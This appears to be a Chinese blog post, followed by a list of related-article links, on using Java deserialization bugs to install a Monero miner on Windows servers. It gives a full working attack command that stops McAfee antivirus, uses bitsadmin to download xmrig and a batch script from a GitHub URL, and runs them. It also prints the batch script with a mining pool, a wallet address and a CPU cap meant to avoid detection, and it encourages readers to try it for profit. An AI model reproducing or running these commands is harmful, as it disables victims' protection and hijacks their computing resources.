利用Java反序列化漏洞在Windows上的挖矿实验
最近,安全社区中有很多人都在讨论如何利用Java反序列化漏洞来攻击类似Apache、SOLR和WebLogic之类的系统。不说废话,我们直接进入正题。目前绝大多数的此类攻击针对的都是Linux/Unix系统,但是我近期发现了一种针对Windows系统的攻击方法。
PS:本文仅用于技术讨论与分享,严禁用于非法用途
攻击代码如下:
cmd/cnet stop"McAfee McShield;net stop mcafeeframework;bitsadmin.exe /transfer"xmrig.bat" /download /priority foregroundhttp://raw.githubusercontent.com/sirikun/starships/master/xmrig.bat"%cd%\xmrig.bat";bitsadmin.exe /transfer "xmrig.exe"/download /priority foregroundhttp://raw.githubusercontent.com/sirikun/starships/master/xmrig.exe"%cd%\xmrig.exe;dir xmrig*;xmrig.bat;tasklist;
实际的Payload分析
关闭McAfee反病毒软件(我不明白社区中的这种技术为啥只关掉McAfee…):
netstop "McAfee McShield;netstop mcafeeframework;
使用bitsadmin从GitHub下载加密货币挖矿程序和一个batch脚本文件:
bitsadmin.exe/transfer "xmrig.bat" /download /priority foregroundhttp://raw.githubusercontent.com/sirikun/starships/master/xmrig.bat"%cd%\xmrig.bat";bitsadmin.exe/transfer "xmrig.exe" /download /priority foreground http://raw.githubusercontent.com/sirikun/starships/master/xmrig.exe"%cd%\xmrig.exe;dirxmrig*;xmrig.bat;tasklist;
Batch脚本文件代码如下:
taskkill/im /f xmrig.exe /tnetstop "McAfee McShield"netstop mcafeeframeworkxmrig.exe-o http://monerohash.com:3333 -u 42jF56tc85UTZwhMQc6rHbMHTxHqK74qS2zqLyRZxLbwegsy7FJ9w4T5B69Ay5qeMEMuvVDwHNeopAxrEZkkHrMb5phovJ6-p x --background --max-cpu-usage=50 --donate-level=1
首先,上述代码会终止其他xmrig进程(可能是为了防止资源竞争)。接下来,它会关闭McAfee。然后便会开启挖矿程序,并跟http://monerohash.com矿池(端口3333)进行连接。它只会占用大约50%的CPU资源,估计是为了避免被检测到吧。
目前为止,这个挖矿程序的计算能力只能实现350哈希每秒,并为我挖到了40个门罗币(价值约为7000美元)。
感兴趣的同学可以自己动手试一试,说不定会有一些意想不到的收获。
利用Java反序列化漏洞在Windows上的挖矿实验相关推荐
- java反序列化漏洞POP查找_利用 Java 反序列化漏洞在受限环境下获取反向 Shell
原标题:利用 Java 反序列化漏洞在受限环境下获取反向 Shell 原文链接: https://medium.com/abn-amro-red-team/java-deserialization-f ...
- Java反序列化漏洞通用利用分析
2015年11月6日,FoxGlove Security安全团队的@breenmachine 发布的一篇博客[3]中介绍了如何利用Java反序列化漏洞,来攻击最新版的WebLogic.WebSpher ...
- Lib之过?Java反序列化漏洞通用利用分析
1 背景 2015年11月6日,FoxGlove Security安全团队的@breenmachine 发布的一篇博客[3]中介绍了如何利用Java反序列化漏洞,来***最新版的WebLogic.We ...
- java反序列化漏洞 poc_Java反序列化漏洞详解
Java反序列化漏洞从爆出到现在快2个月了,已有白帽子实现了jenkins,weblogic,jboss等的代码执行利用工具.本文对于Java反序列化的漏洞简述后,并对于Java反序列化的Poc进行详 ...
- java反序列化漏洞挖掘
java反序列化漏洞挖掘 1.漏洞触发场景 在java编写的web应用与web服务器间java通常会发送大量的序列化对象例如以下场景: 1)HTTP请求中的参数,cookies以及Parameters ...
- java反序列化漏洞分析
Java反序列化漏洞(Java Deserialization Vulnerabilities)是一种常见的安全漏洞,其攻击方式是利用Java中的序列化和反序列化机制,通过在序列化数据中插入恶意代码, ...
- java 反序列化漏洞 利用思路简介
目录 序列化的过程 readObject方法 反射链 完成反序列漏洞实践 结论 之前听别人讲解反序列化的漏洞听的晕乎乎的,刚脆就趁着周末研究一下反序列化漏洞,并且搭建实战环境实际操作了一把,明白了之后 ...
- 深入理解JNDI注入与Java反序列化漏洞利用
rmi 和 jndi 这些概念,一直接触,但是看了会儿 还是略微懵逼,这篇文章 暂时理清了我的思路 [承上启下]----------------------------------上边属于我自己瞎扯的 ...
- 6-java安全——java反序列化漏洞利用链
本篇将结合一个apache commons-collections组件来学习java反序列化漏洞原理,以及如何构造利用链. 我们知道序列化操作主要是由ObjectOutputStream类的 writ ...
最新文章
- php查找多个字符串替换,php 替换多个字符串
- MIT 的新型开源系统 Taco 将数据分析速度提升 100 倍 !(附论文)
- 分分钟搭建Oracle环境
- C++ exception 类继承结构图
- javascript --- 函数的柯里化 Vue 2.x中柯里化的使用
- android生成aar无效,android studio生成aar包并在其他工程引用aar包的方法
- python server酱_Python使用微信收取通知
- python的装饰器很有用吗_你真的了解python装饰器么
- PHP json_encode中文乱码解决方法
- Word字体修改(罚抄,抄作业专用)
- 《图谋职场——最经济的图形沟通》 一种能提高职场竞争力的沟通能力
- 易用宝项目记录day3-curd
- 商业计划书PPT模板
- Linux 2038年问题
- 计算机无法安装VC2015,VC++2015安装失败怎么办 VS2015安装失败解决方法
- sprd 11 播放视频时开启录屏,视频闪烁或提示正在加载问题
- 针对云主机卡死问题的定位分析方法
- Unity 如何写一个足球运动员AI(一)
- 技术一般的程序员找工作,如今真的一年比一年难...
- [CQOI2009]循环赛[HNOI2013]比赛
热门文章
- echarts绘制各种图表(柱形、折线、柱形、饼图、南丁格尔、环形、中国地图散点图、百度地图散点图、词云图)
- 小孔成像总结_初中生必看:中考物理解题技巧+方法总结!
- 文科生学python_一个文科生的python心路历程
- signature=3cb79ad68e1de6fcae23aede975d0e4e,考研二外法语易错题汇总
- 校园 爆料 开怀一笑
- 破茧成蝶——我的北大之路(文/贺舒婷)
- IP分片(一)【羊羊洒洒的Blog】
- 全面了解三极管——三极管基本参数1
- power supply frameware 框架
- 【剑指 Java】第 1 弹:靠这份 Java 基础知识总结,我拿到了满意的 Offer